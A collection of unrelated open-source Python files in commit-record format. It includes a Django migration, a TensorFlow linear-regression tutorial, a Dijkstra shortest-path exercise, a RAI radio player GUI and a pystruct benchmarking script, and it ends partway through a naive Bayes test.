test = _ScreenshotSyncValidator
def CreateExpectations(self, page_set):
return expectations.ScreenshotSyncExpectations()
def CreatePageSet(self, options):
ps = page_set.PageSet(file_path=data_path, serving_dirs=[''])
ps.AddPage(ScreenshotSyncPage(ps, ps.base_dir))
return ps
| bsd-3-clause | Python |
48e19852c6e1f5a0f2792a62adeb560121d77d11 | Create __init__.py | thegreathippo/crispy | crispy/__init__.py | crispy/__init__.py | mit | Python |
||
ca25a4e2aedd657a10c7bfa2849f9f3d16f5ee9f | Add Eq demo | NicolasT/typeclasses | demo/eq.py | demo/eq.py | # typeclasses, an educational implementation of Haskell-style type
# classes, in Python
#
# Copyright (C) 2010 Nicolas Trangez <eikke eikke com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, version 2.1
# of the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
'''Some demonstrations of the Eq typeclass and its `eq` and `ne` functions'''
from typeclasses.eq import eq, ne
import typeclasses.instances.list
import typeclasses.instances.tuple
from typeclasses.instances.maybe import Just, Nothing
from typeclasses.instances.tree import Branch, Leaf
# List
assert eq([1, 2, 3], [1, 2, 3])
assert ne([0, 1, 2], [1, 2, 3])
# Tuple
assert eq((1, 2, 3, ), (1, 2, 3, ))
assert ne((0, 1, 2, ), (1, 2, 3, ))
# Maybe
assert eq(Nothing, Nothing)
assert eq(Just(1), Just(1))
assert ne(Just(1), Just(2))
assert ne(Just(1), Nothing)
# Tree
assert eq(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)))
assert ne(Branch(Branch(Leaf(0), Leaf(1)), Leaf(2)),
Branch(Branch(Leaf(0), Leaf(1)), Branch(Leaf(2), Leaf(3))))
| lgpl-2.1 | Python |
|
176ab29c5f0506d5ba94a2676b81f34f7e2a6b3b | Add migration for expiration_date change (#28) | vittoriozamboni/django-groups-manager,vittoriozamboni/django-groups-manager | groups_manager/migrations/0005_auto_20181001_1009.py | groups_manager/migrations/0005_auto_20181001_1009.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-10-01 10:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('groups_manager', '0004_0_6_0_groupmember_expiration_date'),
]
operations = [
migrations.AlterField(
model_name='groupmember',
name='expiration_date',
field=models.DateTimeField(blank=True, default=None, null=True),
),
]
| mit | Python |
|
7043c46624df6f1899df9fc58e1a8631fc67f43d | add log.py | simbuerg/benchbuild,simbuerg/benchbuild | pprof/log.py | pprof/log.py | #!/usr/bin/env python
# encoding: utf-8
""" Analyze the PPROF database. """
from plumbum import cli
from pprof.driver import PollyProfiling
def print_runs(query):
""" Print all rows in this result query. """
if query is None:
return
for tup in query:
print("{} @ {} - {} id: {} group: {}".format(
tup.finished,
tup.experiment_name, tup.project_name,
tup.experiment_group, tup.run_group))
def print_logs(query, types=None):
""" Print status logs. """
from pprof.utils.schema import RunLog
if query is None:
return
query = query.filter(RunLog.status != 0)
for run, log in query:
print("{} @ {} - {} id: {} group: {} status: {}".format(
run.finished, run.experiment_name, run.project_name,
run.experiment_group, run.run_group,
log.status))
if "stderr" in types:
print "StdErr:"
print(log.stderr)
if "stdout" in types:
print "StdOut:"
print(log.stdout)
print
@PollyProfiling.subcommand("log")
class PprofLog(cli.Application):
""" Frontend command to the pprof database. """
@cli.switch(["-E", "--experiment"], str, list=True,
help="Experiments to fetch the log for.")
def experiment(self, experiments):
""" Set the experiments to fetch the log for. """
self._experiments = experiments
@cli.switch(["-e", "--experiment-id"], str, list=True,
help="Experiment IDs to fetch the log for.")
def experiment_ids(self, experiment_ids):
""" Set the experiment ids to fetch the log for. """
self._experiment_ids = experiment_ids
@cli.switch(["-P", "--project"], str, list=True,
help="Projects to fetch the log for.")
def project(self, projects):
""" Set the projects to fetch the log for. """
self._projects = projects
@cli.switch(["-p", "--project-id"], str, list=True,
help="Project IDs to fetch the log for.")
def project_ids(self, project_ids):
""" Set the project ids to fetch the log for. """
self._project_ids = project_ids
@cli.switch(["-t", "--type"], cli.Set("stdout", "stderr"), list=True,
help="Set the output types to print.")
def log_type(self, types):
""" Set the output types to print. """
self._types = types
_experiments = None
_experiment_ids = None
_projects = None
_project_ids = None
_types = None
def main(self):
""" Run the log command. """
from pprof.utils.schema import Session, Run, RunLog
s = Session()
exps = self._experiments
exp_ids = self._experiment_ids
projects = self._projects
project_ids = self._project_ids
types = self._types
if types is not None:
query = s.query(Run, RunLog).filter(Run.id == RunLog.run_id)
else:
query = s.query(Run)
if exps is not None:
query = query.filter(Run.experiment_name.in_(exps))
if exp_ids is not None:
query = query.filter(Run.experiment_group.in_(exp_ids))
if projects is not None:
query = query.filter(Run.project_name.in_(projects))
if project_ids is not None:
query = query.filter(Run.run_group.in_(project_ids))
if types is not None:
print_logs(query, types)
else:
print_runs(query)
| mit | Python |
|
caa92a302f3dcc6ed084ebc9f20db28c63d48d29 | Add missing file | warnes/irrigatorpro,warnes/irrigatorpro,warnes/irrigatorpro,warnes/irrigatorpro | irrigator_pro/uga/aggregates.py | irrigator_pro/uga/aggregates.py | from django.db import connections
from django.db.models.aggregates import Aggregate
from django.db.models.sql.aggregates import Aggregate as SQLAggregate
from uga.models import UGAProbeData
__initialized__ = False
class SimpleAggregate(Aggregate):
def add_to_query(self, query, alias, col, source, is_summary):
aggregate = SQLAggregate(col, source=source, is_summary=is_summary, **self.extra)
aggregate.sql_function = self.sql_function
aggregate.is_ordinal = getattr(self, 'is_ordinal', False)
aggregate.is_computed = getattr(self, 'is_computed', False)
if hasattr(self, 'sql_template'):
aggregate.sql_template = self.sql_template
query.aggregates[alias] = aggregate
class Date(SimpleAggregate):
sql_function = 'Date'
name = 'Date'
| mit | Python |
|
253cda3fc9d377dc64fe4b67b5fe55f911c8693f | Add startsliver script. | nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome,nmc-probe/emulab-nome | protogeni/test/startsliver.py | protogeni/test/startsliver.py | #! /usr/bin/env python
#
# GENIPUBLIC-COPYRIGHT
# Copyright (c) 2008-2009 University of Utah and the Flux Group.
# All rights reserved.
#
# Permission to use, copy, modify and distribute this software is hereby
# granted provided that (1) source code retains these copyright, permission,
# and disclaimer notices, and (2) redistributions including binaries
# reproduce the notices in supporting documentation.
#
# THE UNIVERSITY OF UTAH ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
# CONDITION. THE UNIVERSITY OF UTAH DISCLAIMS ANY LIABILITY OF ANY KIND
# FOR ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
#
#
#
import sys
import pwd
import getopt
import os
import time
import re
import xmlrpclib
from M2Crypto import X509
ACCEPTSLICENAME=1
execfile( "test-common.py" )
#
# Get a credential for myself, that allows me to do things at the SA.
#
mycredential = get_self_credential()
print "Got my SA credential"
#
# Lookup slice
#
myslice = resolve_slice( SLICENAME, mycredential )
print "Found the slice, asking for a credential ..."
#
# Get the slice credential.
#
slicecred = get_slice_credential( myslice, mycredential )
print "Got the slice credential, asking for a sliver credential ..."
#
# Get the sliver credential.
#
params = {}
params["credential"] = slicecred
rval,response = do_method("cm", "GetSliver", params)
if rval:
Fatal("Could not get Sliver credential")
pass
slivercred = response["value"]
print "Got the sliver credential, starting the sliver";
#
# Start the sliver.
#
params = {}
params["credential"] = slivercred
rval,response = do_method("cm", "StartSliver", params)
if rval:
Fatal("Could not start sliver")
pass
print "Sliver has been started ..."
| agpl-3.0 | Python |
|
aa88f2b64c8c2837022ee020862ec2c0a9a6e7ad | Add fabfile for generating docs in gh-pages branch. | openxc/openxc-python,openxc/openxc-python,openxc/openxc-python | fabfile.py | fabfile.py | from __future__ import with_statement
import os
from fabric.api import abort, local, task, lcd
@task(default=True)
def docs(clean='no', browse_='no'):
with lcd('docs'):
local('make clean html')
temp_path = "/tmp/openxc-python-docs"
docs_path = "%s/docs/_build/html" % local("pwd", capture=True)
local('rm -rf %s' % temp_path)
os.makedirs(temp_path)
with lcd(temp_path):
local('cp -R %s %s' % (docs_path, temp_path))
local('git checkout gh-pages')
local('cp -R %s/html/* .' % temp_path)
local('touch .nojekyll')
local('git add -A')
local('git commit -m "Update Sphinx docs."')
local('git push')
local('git checkout master')
@task
def browse():
"""
Open the current dev docs in a browser tab.
"""
local("$BROWSER docs/_build/html/index.html")
@task(default=True)
def test(args=None):
local("tox")
@task
def upload():
"""
Build, register and upload to PyPI
"""
puts("Uploading to PyPI")
local('python setup.py sdist register upload')
| bsd-3-clause | Python |
|
1e4f86f3184d0ae09d2a14690257ba9d4c44edb1 | remove dups (local sequence alignments) | brwnj/repertoire,brwnj/repertoire | repertoire/collapse_reads.py | repertoire/collapse_reads.py | #!/usr/bin/env python
# encoding: utf-8
"""
matches = pairwise2.align.localms(target, query, 1, -1, -3, -2)
try:
# highest scoring match first
return int(matches[0][3])
except IndexError:
"""
import sys
from toolshed import nopen
from parsers import read_fastx
from Bio import pairwise2
from collections import OrderedDict
def fastq_to_dict(fastq):
"""docstring for fastq_to_dict"""
d = {}
with nopen(fastq) as fh:
for name, seq, qual in read_fastx(fh):
d[name] = {'seq':seq,'qual':qual}
return d
def main(args):
fd = fastq_to_dict(args.fastq)
# convert to ordered dictionary
fd = OrderedDict(sorted(fd.items(), key=lambda (k, v): len(v['seq'])))
seen = {}
for i, (name, query) in enumerate(fd.iteritems(), start=1):
if i % 1000 == 0:
print >> sys.stderr, ">> processed %d reads..." % i
subseq = False
q_id, q_cregion, q_fwork = name.split(":")
expected_score = len(query['seq']) - args.mismatches
# maps onto same length or longer seqs
for t_name, target in fd.iteritems():
if t_name == name: continue
# skipping reads we've already mapped
if seen.has_key(t_name): continue
t_id, t_cregion, t_fwork = t_name.split(":")
# only attempt to collapse things of the same c-region and framework
if q_cregion != t_cregion and q_fwork != t_fwork: continue
# locally align using smith-waterman
matches = pairwise2.align.localms(target['seq'], query['seq'], 1, -1, -1, -1)
high_score = matches[0][2]
if high_score == expected_score:
subseq = True
break
if not subseq:
# print fastq record
print "@%s\n%s\n+\n%s" % (name, query['seq'], query['qual'])
seen[name] = ""
if __name__ == '__main__':
import argparse
p = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
p.add_argument('fastq', help="reads to collapse to unique")
p.add_argument('-m', '--mismatches', type=int, default=0,
help="mismatches to allow during mapping [ %(default)s ]")
main(p.parse_args()) | mit | Python |
|
736093f945ff53c4fe6d9d8d2e0c4afc28d9ace3 | Add answer to leetcode rotate list | air-upc/chimera,air-upc/chimera | chimera/py/leetcode_rotate_list.py | chimera/py/leetcode_rotate_list.py | # coding=utf-8
"""
chimera.leetcode_rotate_list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Given a list, rotate the list to the right by k places, where k is
non-negative.
For example:
Given 1->2->3->4->5->NULL and k = 2,
return 4->5->1->2->3->NULL.
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
if not head:
return head
tail = p = head
n = 0
while tail:
n += 1
p = tail
tail = tail.next
p.next = head
rotate = k % n
for i in xrange(n - rotate):
p = head
head = head.next
p.next = None
return head
| mit | Python |
|
22bb91cfc1b1dc637e33625dcbaf3e8499b384ec | Add LinearRegression.py | Jamjomjara/snu-artoon,Jamjomjara/snu-artoon | 1-LinearRegression/LinearRegression.py | 1-LinearRegression/LinearRegression.py | import tensorflow as tf
# TensorFlow Example (1) - Linear Regression
#
# (model) y = ax + b
# By giving some pairs of (x, y) that satisfies the given model,
# TensorFlow can compute the value of 'a' and 'b'
# by using very simple Machine Learning(ML) algorithm.
# 1. implementing our model.
# TensorFlow has an element called 'node'.
# A 'node' can be formed from a Tensor(i.e. values),
# or by combining nodes with arithmetic operations.
# We should implement our model (y = ax + b) first.
# There are a few types of values.
# 1. constants: values which cannot change.
# 2. placeholders: values that we should give when computing.
# 3. variables: values that can be changed while computing.
# therefore, in our model y = ax + b
# 'x' is given by us so it should be 'placeholder',
# and 'a' and 'b' is computed by TensorFlow, which therefore
# should be variables.
x = tf.placeholder(tf.float32)
a = tf.Variable([1.0], tf.float32)
b = tf.Variable([1.0]) # data type inferred automatically
model_y = a * x + b # same with 'y = tf.add(tf.multiply(a, x), b)'
# 2. let the computer know our goal.
# To compute 'a' and 'b' value using ML,
# we should let machine know what is their goal.
# in this case, the computation result of the model should be
# the same with real value(which is given by us.)
# to accomplish this goal, we design a function(which is called
# 'loss function'), and the goal of the machine is to minimize
# the value of loss function.
real_y = tf.placeholder(tf.float32)
error = model_y - real_y
squared_error = tf.square(error) # make all errors positive to compute average
sum_error = tf.reduce_sum(squared_error) # this is our loss function whose value should be minimized.
# 3. compute 'a' and 'b' value using ML.
# now we designed our model and the goal of the machine.
# therefore, now what we have to do is just command the machine
# to find the value 'a' and 'b' that minimizes our loss function(sum_error)
# to do that, we give our machine some data sets.
# (the exact (x, y) pairs to compute 'a' and 'b' values.
x_training_data = [1, 2, 3, 4]
y_training_data = [3, 5, 7, 9] # y = 2x + 1 is the correct model
# to run a TensorFlow computation, we need something called 'Session'.
session = tf.Session()
# first, make all the Variables to be set to its initial value(which are wrong)
session.run(tf.global_variables_initializer())
# then, make machine to compute the right 'a' and 'b' value.
optimizer = tf.train.GradientDescentOptimizer(0.01) # Machine's algorithm to find 'a' and 'b'
train = optimizer.minimize(sum_error)
for _ in range(10000):
session.run(train, {x: x_training_data, real_y: y_training_data})
# 4. Machine finished computing 'a' and 'b' value.
# this code below will print out that values.
a, b = session.run([a, b])
print("a :", a)
print("b :", b)
| mit | Python |
|
08d7e10d74297f16e4bcb5cfb7de0749d9d101bc | add missing fiel | codesyntax/CodeSkel,codesyntax/CodeSkel,codesyntax/CodeSkel,codesyntax/CodeSkel | codeskel/localcommands/__init__.py | codeskel/localcommands/__init__.py | mit | Python |
||
0c289af5ef7f26796bdc4b4183f456074f7440f7 | Create dijkstra.py | oy-vey/algorithms-and-data-structures,oy-vey/algorithms-and-data-structures | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | 3-AlgorithmsOnGraphs/Week4/dijkstra/dijkstra.py | #Uses python3
import sys
import queue
def Dijkstra(adj, s, cost, t):
dist = list()
prev = list()
inf = 0
for c in cost:
inf += sum(c)
inf += 1
for u in range(0, len(adj)):
dist.append(inf)
prev.append(None)
dist[s] = 0
H = queue.PriorityQueue()
for i, d in enumerate(dist):
H.put((d, i))
processed = set()
while not H.empty():
u = H.get()[1]
if u in processed:
pass
for i, v in enumerate(adj[u]):
if dist[v] > dist[u] + cost[u][i]:
dist[v] = dist[u] + cost[u][i]
prev[v] = u
H.put((dist[v], v))
processed.add(v)
if dist[t]< inf:
return dist[t]
else:
return -1
def distance(adj, cost, s, t):
return Dijkstra(adj, s, cost, t)
if __name__ == '__main__':
# input = sys.stdin.read()
with open('test', 'r') as f:
input = f.read()
data = list(map(int, input.split()))
n, m = data[0:2]
data = data[2:]
edges = list(zip(zip(data[0:(3 * m):3], data[1:(3 * m):3]), data[2:(3 * m):3]))
data = data[3 * m:]
adj = [[] for _ in range(n)]
cost = [[] for _ in range(n)]
for ((a, b), w) in edges:
adj[a - 1].append(b - 1)
cost[a - 1].append(w)
s, t = data[0] - 1, data[1] - 1
print(distance(adj, cost, s, t))
| mit | Python |
|
26ae4b857780ba8d5ecfbd8c8cab39452f086e58 | add conf.py for docs (test) | bazooka-ci/bazooka,bazooka-ci/bazooka,bazooka-ci/bazooka,bazooka-ci/bazooka | docs/conf.py | docs/conf.py | # -*- coding: utf-8 -*-
#
# bazooka documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 3 13:34:12 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.md'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bazooka'
copyright = u'2015, Bazooka-ci team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'master'
# The full version, including alpha/beta/rc tags.
release = 'master'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bazookadoc'
| mit | Python |
|
18e8cee5c19329dac7e931cb00e67f8d19e3f89d | add script `compare_win_set` | johnyf/gr1experiments | examples/bunny/compare_win_set.py | examples/bunny/compare_win_set.py | from dd import cudd
b = cudd.BDD()
u_gr1x = cudd.load('winning_set', b)
u_slugs = b.load('winning_set_bdd.txt')
env_action_slugs = b.load('env_action_slugs.txt')
sys_action_slugs = b.load('sys_action_slugs.txt')
assumption_0_slugs = b.load('assumption_0_slugs.txt')
goal_0_slugs = b.load('goal_0_slugs.txt')
env_action_gr1x = b.load('env_action_gr1x.txt')
sys_action_gr1x = b.load('sys_action_gr1x.txt')
assumption_0_gr1x = b.load('assumption_0_gr1x.txt')
goal_0_gr1x = b.load('goal_0_gr1x.txt')
assert env_action_slugs == env_action_gr1x
assert sys_action_slugs == sys_action_gr1x
assert assumption_0_slugs == assumption_0_gr1x
assert goal_0_slugs == goal_0_gr1x
if u_gr1x == u_slugs:
print('Winning set is the same.')
else:
print('Different winning sets!')
del u_gr1x, u_slugs
| bsd-3-clause | Python |
|
46bcea5a4c1a46cd7e458fa5fd7b761bbea25b4f | add a RAI radio player | stefantalpalaru/bbc_radio | rai_radio.py | rai_radio.py | #!/usr/bin/env python
import sys
from PySide.QtCore import *
from PySide.QtGui import *
from pprint import pprint
import subprocess
import argparse
# URL list taken from http://www.rai.it/dl/portale/info_radio.html
STATIONS = [
['Radio 1', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162834'],
['Radio 2', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162063'],
['Radio 3', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=162841'],
['Filodiffusione 4', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173799'],
['Filodiffusione 5', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173832'],
['Isoradio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173875'],
['Gr Parlamento', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173879'],
['Rai Italia Radio', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=173887'],
['Web Radio WR6', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174078'],
['Web Radio WR7', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174083'],
['Web Radio WR8', 'http://mediapolis.rai.it/relinker/relinkerServlet.htm?cont=174086 '],
]
WIN_TITLE = "RAI radio"
class Win(QMainWindow):
def __init__(self, parent=None):
super(Win, self).__init__(parent)
self.player = None
# args
parser = argparse.ArgumentParser(description='BBC radio player')
parser.add_argument('-p', '--player', default='vlc')
parser.add_argument('player_args', nargs='*')
args = parser.parse_args()
self.player_prog = args.player
self.player_args = args.player_args
# UI
self.setWindowTitle(WIN_TITLE)
self.setMinimumSize(300, 600)
self.scroll_area = QScrollArea()
self.widget = QWidget()
self.layout = QVBoxLayout()
self.widget.setLayout(self.layout)
self.scroll_area.setWidgetResizable(True)
self.scroll_area.setWidget(self.widget)
self.setCentralWidget(self.scroll_area)
for name, url in STATIONS:
button = QPushButton(name.replace('&', '&&'))
button.args = {
'name': name,
'url': url,
}
button.clicked.connect(self.listen)
self.layout.addWidget(button)
# timer
self.timer = QTimer()
self.timer.timeout.connect(self.check_player)
def listen(self):
pressed_button = self.sender()
for button in self.widget.findChildren(QPushButton):
if button != pressed_button and not button.isEnabled():
button.setEnabled(True)
break
pressed_button.setEnabled(False)
# stop the running player instance before starting another one
if self.player:
if self.player.poll() is None:
self.player.terminate()
self.player.wait()
cmd = [self.player_prog]
cmd.extend(self.player_args)
cmd.append(pressed_button.args['url'])
try:
self.player = subprocess.Popen(cmd)
except Exception, e:
msg_box = QMessageBox()
msg_box.setText('Couldn\'t launch\n"%s"' % ' '.join(cmd))
msg_box.setInformativeText(unicode(e))
msg_box.exec_()
pressed_button.setEnabled(True)
self.setWindowTitle('%s - %s' % (pressed_button.args['name'], WIN_TITLE))
self.timer.start(200)
def check_player(self):
if self.player and self.player.poll() is not None:
# the player has been stopped
self.player = None
self.timer.stop()
self.setWindowTitle(WIN_TITLE)
for button in self.widget.findChildren(QPushButton):
if not button.isEnabled():
button.setEnabled(True)
break
if __name__ == '__main__':
app = QApplication(sys.argv)
win = Win()
win.show()
sys.exit(app.exec_())
| bsd-3-clause | Python |
|
f4e4d2781662f7f8c38b12aacc5ad0fca6e1b4da | add comparison with svm^struct on multiclass data | pystruct/pystruct,wattlebird/pystruct,amueller/pystruct,massmutual/pystruct,pystruct/pystruct,d-mittal/pystruct,massmutual/pystruct,amueller/pystruct,wattlebird/pystruct,d-mittal/pystruct | examples/multiclass_comparision_svm_struct.py | examples/multiclass_comparision_svm_struct.py | """
==================================================================
Comparing PyStruct and SVM-Struct for multi-class classification
==================================================================
This example compares the performance of pystruct and SVM^struct on a
multi-class problem.
For the example to work, you need to install SVM^multiclass and
set the path in this file.
We are not using SVM^python, as that would be much slower, and we would
need to implement our own model in a SVM^python compatible way.
Instead, we just call the SVM^multiclass binary.
This comparison is only meaningful in the sense that both libraries
use general structured prediction solvers to solve the task.
The specialized implementation of the Crammer-Singer SVM in LibLinear
is much faster than either one.
The plots are adjusted to disregard the time spend in writing
the data to the file for use with SVM^struct. As this time is
machine dependent, the plots are only approximate (unless you measure
that time for your machine and re-adjust)
"""
import tempfile
import os
from time import time
import numpy as np
from sklearn.datasets import dump_svmlight_file
from sklearn.datasets import fetch_mldata, load_iris, load_digits
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
from pystruct.models import CrammerSingerSVMModel
from pystruct.learners import OneSlackSSVM
# please set the path to the svm-struct multiclass binaries here
svmstruct_path = "/home/local/lamueller/tools/svm_multiclass/"
class MultiSVM():
"""scikit-learn compatible interface for SVM^multi.
Dumps the data to a file and calls the binary.
"""
def __init__(self, C=1.):
self.C = C
def fit(self, X, y):
self.model_file = tempfile.mktemp(suffix='.svm')
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y + 1, train_data_file, zero_based=False)
C = self.C * 100. * len(X)
os.system(svmstruct_path + "svm_multiclass_learn -c %f %s %s"
% (C, train_data_file, self.model_file))
def _predict(self, X, y=None):
if y is None:
y = np.ones(len(X))
train_data_file = tempfile.mktemp(suffix='.svm_dat')
dump_svmlight_file(X, y, train_data_file, zero_based=False)
prediction_file = tempfile.mktemp(suffix='.out')
os.system(svmstruct_path + "svm_multiclass_classify %s %s %s"
% (train_data_file, self.model_file, prediction_file))
return np.loadtxt(prediction_file)
def predict(self, X):
return self._predict(X)[:, 0] - 1
def score(self, X, y):
y_pred = self.predict(X)
return accuracy_score(y, y_pred)
def decision_function(self, X):
return self._predict(X)[:, 1:]
def eval_on_data(X, y, svm, Cs):
accuracies, times = [], []
for C in Cs:
svm.C = C
start = time()
svm.fit(X, y)
times.append(time() - start)
accuracies.append(accuracy_score(y, svm.predict(X)))
return accuracies, times
def plot_timings(times_svmstruct, times_pystruct, dataset="usps"):
plt.figure()
plt.figsize(4, 3)
plt.plot(times_svmstruct, ":", label="SVM^struct", c='blue')
plt.plot(times_pystruct, "-.", label="PyStruct", c='red')
plt.xlabel("C")
plt.xticks(np.arange(len(Cs)), Cs)
plt.ylabel("learning time (s)")
plt.legend(loc='best')
plt.savefig("timings_%s.pdf" % dataset, bbox_inches='tight')
if __name__ == "__main__":
Cs = 10. ** np.arange(-4, 1)
multisvm = MultiSVM()
svm = OneSlackSSVM(CrammerSingerSVMModel(tol=0.001))
iris = load_iris()
X, y = iris.data, iris.target
accs_pystruct, times_pystruct = eval_on_data(X, y, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
# the adjustment of 0.01 is for the time spent writing the file, see above.
plot_timings(np.array(times_svmstruct) - 0.01, times_pystruct,
dataset="iris")
digits = load_digits()
X, y = digits.data / 16., digits.target
accs_pystruct, times_pystruct = eval_on_data(X, y, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, MultiSVM(), Cs=Cs)
plot_timings(np.array(times_svmstruct) - 0.85, times_pystruct,
dataset="digits")
digits = fetch_mldata("USPS")
X, y = digits.data, digits.target.astype(np.int)
accs_pystruct, times_pystruct = eval_on_data(X, y - 1, svm, Cs=Cs)
accs_svmstruct, times_svmstruct = eval_on_data(X, y, multisvm, Cs=Cs)
plot_timings(np.array(times_svmstruct) - 35, times_pystruct,
dataset="usps")
plt.show()
| bsd-2-clause | Python |
|
cc19cdc3430df018e3a8fa63abaf796a897a475b | Add naive bayes SQL test. | kwikadi/orange3,kwikadi/orange3,qPCR4vir/orange3,kwikadi/orange3,cheral/orange3,qusp/orange3,marinkaz/orange3,cheral/orange3,qusp/orange3,kwikadi/orange3,kwikadi/orange3,cheral/orange3,marinkaz/orange3,qPCR4vir/orange3,qPCR4vir/orange3,kwikadi/orange3,marinkaz/orange3,cheral/orange3,qusp/orange3,qPCR4vir/orange3,qPCR4vir/orange3,qusp/orange3,marinkaz/orange3,cheral/orange3,marinkaz/orange3,marinkaz/orange3,qPCR4vir/orange3,cheral/orange3 | Orange/tests/sql/test_naive_bayes.py | Orange/tests/sql/test_naive_bayes.py | import unittest
from numpy import array
import Orange.classification.naive_bayes as nb
from Orange.data.discretization import DiscretizeTable
from Orange.data.sql.table import SqlTable
from Orange.data.variable import DiscreteVariable
class NaiveBayesTest(unittest.TestCase):
def test_NaiveBayes(self):
table = SqlTable(host='localhost', database='test', table='iris',
